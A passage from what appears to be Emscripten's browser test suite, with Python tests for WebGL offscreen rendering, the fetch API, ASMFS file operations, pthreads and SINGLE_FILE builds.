        self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])

@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
    """Render WebGL solely inside a pthread, using an offscreen framebuffer."""
    self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
    """Draw from client-side memory (FULL_ES2) with automatic extension enabling off."""
    self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
    """Render with each WEBGL_multi_draw entry point and compare against the
    shared reference image."""
    for draw_mode in ('MULTI_DRAW_ARRAYS',
                      'MULTI_DRAW_ARRAYS_INSTANCED',
                      'MULTI_DRAW_ELEMENTS',
                      'MULTI_DRAW_ELEMENTS_INSTANCED'):
        self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
                   args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-D' + draw_mode + '=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
    """Render with base_vertex/base_instance, covering all four combinations of
    multi-draw on/off and indexed (drawElements) on/off."""
    for multiDraw in [0, 1]:
        for drawElements in [0, 1]:
            self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
                       args=['-lGL',
                             '-s', 'MAX_WEBGL_VERSION=2',
                             '-s', 'OFFSCREEN_FRAMEBUFFER',
                             '-DMULTI_DRAW=' + str(multiDraw),
                             '-DDRAW_ELEMENTS=' + str(drawElements),
                             '-DEXPLICIT_SWAP=1',
                             '-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
    """Exercise offscreen-framebuffer rendering across GL emulation levels
    (default, FULL_ES2, FULL_ES3) and with/without pthread proxying."""
    # Tests all the different possible versions of libgl
    for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
        # Fix: the second list entry duplicated FULL_ES3; it should be FULL_ES2
        # so that each GL emulation level is covered exactly once.
        for version in [[], ['-s', 'FULL_ES2'], ['-s', 'FULL_ES3']]:
            args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
            print('with args: %s' % str(args))
            self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
    """VAO usage must work with GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0."""
    self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])

# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
    """Swap with deliberately perturbed GL state and verify state restoration on
    every restoration code path (full restore vs VAO, WebGL 1 vs 2)."""
    for args in [
        # full state restoration path on WebGL 1.0
        ['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
        # VAO path on WebGL 1.0
        ['-s', 'MAX_WEBGL_VERSION'],
        ['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
        # VAO path on WebGL 2.0
        ['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
        # full state restoration path on WebGL 2.0
        ['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
        # blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
        ['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
    ]:
        cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
        self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)

# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
    """Rendering still works with the old uniform-upload-offset bug workaround on."""
    self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])

# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
    """Uniform arrays-of-structs render correctly (compared to reference image)."""
    self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
    """WebGL from a proxied pthread, with and without Asyncify."""
    for asyncify in [0, 1]:
        cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
        if asyncify:
            # given the synchronous render loop here, asyncify is needed to see intermediate frames and
            # the gradual color change
            cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
        print(str(cmd))
        self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)

@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
    """Resize an OffscreenCanvas from the main thread across all combinations of
    proxying, blocking loops, and OffscreenCanvas support."""
    for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
        for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
            for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
                cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
                print(str(cmd))
                self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)

@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
    """Exercise the simple-enable-extensions settings for WebGL 1 and 2,
    with the feature both on and off."""
    for webgl_version in [1, 2]:
        for simple_enable_extensions in [0, 1]:
            cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
                   '-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
                   '-s', 'MAX_WEBGL_VERSION=2',
                   '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
                   '-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
            self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
    """Shell page preallocates Module.buffer before the script loads (WASM=0 only)."""
    self.btest_exit('test_preallocated_heap.cpp', expected='0', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
    """Fetch a file straight into memory, covering both the 404 and 200 cases."""
    # Test error reporting in the negative case when the file URL doesn't exist. (http 404)
    self.btest('fetch/to_memory.cpp',
               expected='1',
               args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
               also_asmjs=True)
    # Test the positive case when the file URL exists. (http 200)
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
        self.btest('fetch/to_memory.cpp',
                   expected='1',
                   args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
                   also_asmjs=True)
def test_fetch_to_indexdb(self):
    """Fetch a file and persist the result into IndexedDB."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/to_indexeddb.cpp',
               expected='1',
               args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
               also_asmjs=True)

# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
    """Fetch once via XHR, then load the cached copy back from IndexedDB."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/cached_xhr.cpp',
               expected='1',
               args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
               also_asmjs=True)

# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
    """Response headers must be populated on the emscripten_fetch_t result."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
    """Stream a large fetched file through memory (currently skipped — the
    underlying moz-chunked-arraybuffer mechanism no longer exists)."""
    self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
    # Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
    # won't fully fit in the heap. This verifies that streaming works properly.
    # NOTE(review): the INITIAL_MEMORY passed below is 536870912 (512MB), which
    # contradicts the "small 16MB heap" described above — confirm the intended
    # heap size if this test is ever re-enabled.
    s = '12345678'
    for i in range(14):
        s = s[::-1] + s # length of str will be 2^17=128KB
    with open('largefile.txt', 'w') as f:
        for i in range(1024):
            f.write(s)
    self.btest('fetch/stream_file.cpp',
               expected='1',
               args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
               also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
    """Synchronous fetch from the (worker-proxied) main thread."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
    """Fetch with none of append/replace/no_download set (append is implied)."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
    """Synchronous fetch from a wasm pthread.

    NOTE(review): this builds the same program with the same flags as
    test_fetch_implicit_append above — confirm both are still intended.
    """
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
    """Synchronous fetch under --proxy-to-worker."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/sync_xhr.cpp',
               expected='1',
               args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
               also_asmjs=True)

# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
    """Wait on an EMSCRIPTEN_FETCH_WAITABLE request (asm.js/WASM=0 only)."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
    """Store fetched data into IndexedDB."""
    self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])

@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
    """Delete previously stored fetch data from IndexedDB."""
    shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
    self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
    """ASMFS: basic file loading, including the valid filename character set."""
    # Test basic file loading and the valid character set for files.
    ensure_dir('dirrey')
    shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
    self.btest_exit('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])

@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
    """ASMFS: reading the same file twice works."""
    shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
    self.btest_exit('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])

@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
    """ASMFS: fopen()/write path."""
    self.btest_exit('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])

@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
    """ASMFS: mkdir/create/unlink/rmdir via the cstdio remove() test."""
    self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])

@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
    """ASMFS: readdir() over a populated directory."""
    self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])

@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
    """ASMFS: readdir() over an empty directory."""
    self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])

@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
    """ASMFS: unistd close()."""
    self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])

@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
    """ASMFS: unistd access()."""
    self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])

@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
    """ASMFS: unistd unlink() (symlinks excluded for now)."""
    # TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
    self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])

@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
    """ASMFS: fcntl open() flag handling."""
    self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])

@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
    """ASMFS: relative path resolution."""
    self.btest_exit('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
    """Run the locale test both single-threaded and with a pthread pool."""
    for args in [
        [],
        ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
    ]:
        print("Testing with: ", args)
        self.btest('pthread/test_pthread_locale.c', expected='1', args=args)

# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
    """Set/get canvas element size from a single-threaded program."""
    self.btest('emscripten_set_canvas_element_size.c', expected='1')

# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
    """Call emscripten_get_device_pixel_ratio() directly and from a proxied pthread."""
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
        self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)

# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
    """Run the emscripten_run_script() variants, with and without PROXY_TO_PTHREAD."""
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
        self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
    """Animate canvas resizes across main-loop / proxied / OffscreenCanvas
    build configurations (always with GL_DEBUG and the thread profiler)."""
    for args in [
        ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
        ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
        ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
        ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
        ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
        ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
    ]:
        cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
        print(' '.join(cmd))
        self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
    """Minimal pthread app, with and without -O3 and MODULARIZE."""
    for opts in [[], ['-O3']]:
        for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
            self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)

# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
    """Minimal pthread app under MINIMAL_RUNTIME, with and without -O3 and MODULARIZE."""
    for opts in [[], ['-O3']]:
        for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
            self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
    """ALLOW_MEMORY_GROWTH with pthreads enabled, growing from the main thread
    (plain, and with PROXY_TO_PTHREAD)."""
    self.emcc_args.remove('-Werror')

    # Avoid a mutable default argument ([]); None is the conventional sentinel.
    def run(emcc_args=None):
        emcc_args = emcc_args or []
        self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)

    run()
    run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
    """ALLOW_MEMORY_GROWTH with the growth triggered from inside a pthread
    (plain, with ASSERTIONS, and with PROXY_TO_PTHREAD)."""
    self.emcc_args.remove('-Werror')

    # Avoid a mutable default argument ([]); None is the conventional sentinel.
    def run(emcc_args=None):
        emcc_args = emcc_args or []
        self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)

    run()
    run(['-s', 'ASSERTIONS'])
    run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
    """Cross-thread timestamps must behave as one monotonic clock."""
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])

# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
    """Load the main JS via a Blob URL (see main_js_as_blob_loader.html) and
    still spawn pthreads."""
    # TODO: enable this with wasm, currently pthreads/atomics have limitations
    self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
    shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
    self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
    """A SINGLE_FILE build must still decode its embedded base64 payload when
    the page provides neither atob() nor fetch()."""
    create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
    # generate a dummy file
    create_test_file('dummy_file', 'dummy')
    # compile the code with the modularize feature and the preload-file option enabled
    self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
    # the HTML below disables atob/fetch before loading the build, forcing the
    # pure-JS base64 fallback path
    create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
    self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
    """SINGLE_FILE must fold every output artifact into the generated HTML."""
    self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
    self.assertExists('test.html')
    # no side-car files may be emitted
    self.assertNotExists('test.js')
    self.assertNotExists('test.worker.js')
    self.assertNotExists('test.wasm')
    self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
    """SINGLE_FILE + MINIMAL_RUNTIME must emit one self-contained .html with no
    side-car files, in wasm and asm.js modes, unoptimized and -O3."""
    for wasm in [0, 1]:
        for opts in [[], ['-O3']]:
            self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
            self.assertExists('test.html')
            # every possible side-car output must have been folded into the html
            # (the original listed test.js twice; the duplicate is removed)
            self.assertNotExists('test.js')
            self.assertNotExists('test.wasm')
            self.assertNotExists('test.asm.js')
            self.assertNotExists('test.mem')
            self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
    """SINGLE_FILE + ENVIRONMENT=web + Closure must still produce a working build."""
    self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])

# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
    """In SINGLE_FILE mode, locateFile() must never be asked to resolve a
    data: URI (the page throws if it is)."""
    for wasm_enabled in [True, False]:
        args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
        if not wasm_enabled:
            args += ['-s', 'WASM=0']
        self.compile_btest(args)
        create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
        self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
    """SINGLE_FILE + --proxy-to-worker must emit one .js and no separate
    test.worker.js file."""
    self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
    create_test_file('test.html', '<script src="test.js"></script>')
    self.run_browser('test.html', None, '/report_result?0')
    self.assertExists('test.js')
    self.assertNotExists('test.worker.js')

# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
    """Start the entire pthread program inside a Worker (workers spawning workers)."""
    self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
    create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
    self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
    """Preloaded file data must remain readable after the heap grows, both with
